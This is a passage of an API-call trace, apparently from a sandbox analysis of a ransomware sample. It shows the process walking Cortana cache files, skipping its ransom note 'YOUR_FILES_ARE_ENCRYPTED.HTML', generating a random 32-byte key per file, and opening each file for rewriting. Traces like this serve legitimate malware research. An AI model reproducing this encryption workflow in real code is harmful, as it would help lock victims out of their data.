lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt" [0118.982] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x680348, NumberOfConcurrentThreads=0x0) returned 0x274 [0118.982] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x680348, lpOverlapped=0x680348) returned 1 [0118.983] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec08e559, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xec08e559, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x59f53a34, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x382fa, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt", cAlternateFileName="C_82F5~1.TXT")) returned 1 [0118.983] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.983] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt") returned 197 [0118.983] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt") returned=".txt" [0118.983] lstrlenW (lpString=".txt") returned 4 [0118.984] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt") returned=".txt" [0118.984] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.984] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_15[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x33c [0118.986] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=230138) returned 1 [0118.986] GetProcessHeap () returned 0x600000 [0118.986] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x680348 [0118.987] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="41") returned 2 [0118.987] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="08") returned 2 [0118.987] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="61") returned 2 [0118.987] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="29") returned 2 [0118.987] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="AD") returned 2 [0118.987] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="AC") returned 2 [0118.987] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="A5") returned 2 [0118.987] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="82") returned 2 [0118.987] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="BB") returned 2 [0118.987] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="EB") returned 2 [0118.987] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="AF") returned 2 [0118.987] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="47") returned 2 [0118.987] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="22") returned 2 [0118.987] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="5E") returned 2 [0118.987] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="89") returned 2 [0118.987] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="8C") returned 2 [0118.987] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="BE") returned 2 [0118.987] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="3F") returned 2 [0118.987] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="FC") returned 2 [0118.987] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="3D") returned 2 [0118.987] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="02") returned 2 [0118.987] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="64") returned 2 [0118.988] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="E9") returned 2 [0118.988] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="1B") returned 2 [0118.988] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="1F") returned 2 [0118.988] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="2D") returned 2 [0118.988] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="87") returned 2 [0118.988] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="65") returned 2 [0118.988] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="59") returned 2 [0118.988] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="DE") returned 2 [0118.988] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="7D") returned 2 [0118.988] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="25") returned 2 [0118.988] lstrcpyW (in: lpString1=0x6903fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt" [0118.988] CreateIoCompletionPort (FileHandle=0x33c, ExistingCompletionPort=0x274, CompletionKey=0x680348, NumberOfConcurrentThreads=0x0) returned 0x274 [0118.988] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x680348, lpOverlapped=0x680348) returned 1 [0118.989] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec08e559, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xec08e559, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x59f79c92, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x19226, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt", cAlternateFileName="C_2306~1.TXT")) returned 1 [0118.989] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.989] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt") returned 197 [0118.989] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt") returned=".txt" [0118.989] lstrlenW (lpString=".txt") returned 4 [0118.989] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt") returned=".txt" [0118.989] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.989] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_16[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x33c [0118.994] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=102950) returned 1 [0118.994] GetProcessHeap () returned 0x600000 [0118.994] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x680348 [0118.994] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="13") returned 2 [0118.994] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="47") returned 2 [0118.994] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="83") returned 2 [0118.994] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="E2") returned 2 [0118.995] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="94") returned 2 [0118.995] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="EF") returned 2 [0118.995] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="33") returned 2 [0118.995] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="44") returned 2 [0118.995] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="74") returned 2 [0118.995] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="86") returned 2 [0118.995] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="D9") returned 2 [0118.995] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="8B") returned 2 [0118.995] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="EB") returned 2 [0118.995] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="B8") returned 2 [0118.995] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="CE") returned 2 [0118.995] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="8E") returned 2 [0118.995] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="A4") returned 2 [0118.995] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="CE") returned 2 [0118.995] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="39") returned 2 [0118.995] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="E7") returned 2 [0118.995] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="18") returned 2 [0118.995] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="44") returned 2 [0118.995] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="FC") returned 2 [0118.995] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="22") returned 2 [0118.995] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="DD") returned 2 [0118.995] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="52") returned 2 [0118.995] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="FA") returned 2 [0118.995] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="E7") returned 2 [0118.995] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="D7") returned 2 [0118.995] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="2C") returned 2 [0118.995] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="66") returned 2 [0118.995] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="63") returned 2 [0118.996] lstrcpyW (in: lpString1=0x6903fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt" [0118.996] CreateIoCompletionPort (FileHandle=0x33c, ExistingCompletionPort=0x274, CompletionKey=0x680348, NumberOfConcurrentThreads=0x0) returned 0x274 [0118.996] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x680348, lpOverlapped=0x680348) returned 1 [0118.996] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec08e559, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xec08e559, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x59f79c92, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x31194, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt", cAlternateFileName="C_399E~1.TXT")) returned 1 [0118.996] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.996] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt") returned 197 [0118.996] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt") returned=".txt" [0118.996] lstrlenW (lpString=".txt") returned 4 [0118.997] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt") returned=".txt" [0118.997] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_17[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x33c [0119.001] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=201108) returned 1 [0119.001] GetProcessHeap () returned 0x600000 [0119.001] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x680348 [0119.003] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="F9") returned 2 [0119.003] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="D8") returned 2 [0119.003] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="AD") returned 2 [0119.003] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="7B") returned 2 [0119.003] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="AE") returned 2 [0119.003] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="F3") returned 2 [0119.003] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="43") returned 2 [0119.003] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="8E") returned 2 [0119.003] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="86") returned 2 [0119.003] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="EB") returned 2 [0119.003] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="7D") returned 2 [0119.004] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="D3") returned 2 [0119.004] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="DC") returned 2 [0119.004] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="59") returned 2 [0119.004] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="F3") returned 2 [0119.004] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="EA") returned 2 [0119.004] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="4C") returned 2 [0119.004] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="59") returned 2 [0119.004] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="F0") returned 2 [0119.004] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="F3") returned 2 [0119.004] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="CA") returned 2 [0119.004] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="FF") returned 2 [0119.004] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="F5") returned 2 [0119.004] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="33") returned 2 [0119.004] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="B7") returned 2 [0119.004] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="E8") returned 2 [0119.004] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="FF") returned 2 [0119.004] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="E9") returned 2 [0119.004] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="1E") returned 2 [0119.004] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="71") returned 2 [0119.004] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="AB") returned 2 [0119.004] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="35") returned 2 [0119.004] lstrcpyW (in: lpString1=0x6903fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt" [0119.005] CreateIoCompletionPort (FileHandle=0x33c, ExistingCompletionPort=0x274, CompletionKey=0x680348, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.005] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x680348, lpOverlapped=0x680348) returned 1 [0119.005] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec0b4810, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xec0b4810, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x397bcfe8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d9, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt", cAlternateFileName="C_503C~1.TXT")) returned 1 [0119.005] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.005] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt") returned 197 [0119.005] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt") returned=".txt" [0119.005] lstrlenW (lpString=".txt") returned 4 [0119.005] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt") returned=".txt" [0119.006] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0119.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_18[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x33c [0119.010] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=1241) returned 1 [0119.010] GetProcessHeap () returned 0x600000 [0119.010] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x680348 [0119.010] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="94") returned 2 [0119.010] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="1F") returned 2 [0119.010] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="5C") returned 2 [0119.010] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="F6") returned 2 [0119.010] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="02") returned 2 [0119.010] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="B2") returned 2 [0119.010] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="23") returned 2 [0119.010] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="F1") returned 2 [0119.010] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="E9") returned 2 [0119.010] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="37") returned 2 [0119.010] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="34") returned 2 [0119.011] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="07") returned 2 [0119.011] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="A7") returned 2 [0119.011] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="7A") returned 2 [0119.011] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="B8") returned 2 [0119.011] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="0B") returned 2 [0119.011] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="85") returned 2 [0119.011] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="8D") returned 2 [0119.011] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="D0") returned 2 [0119.011] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="94") returned 2 [0119.011] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="FE") returned 2 [0119.011] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="40") returned 2 [0119.011] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="75") returned 2 [0119.011] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="A1") returned 2 [0119.011] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="95") returned 2 [0119.011] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="D1") returned 2 [0119.011] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="DE") returned 2 [0119.011] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="3E") returned 2 [0119.011] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="3D") returned 2 [0119.011] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="E0") returned 2 [0119.011] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="CD") returned 2 [0119.011] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="52") returned 2 [0119.012] lstrcpyW (in: lpString1=0x6903fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt" | out: 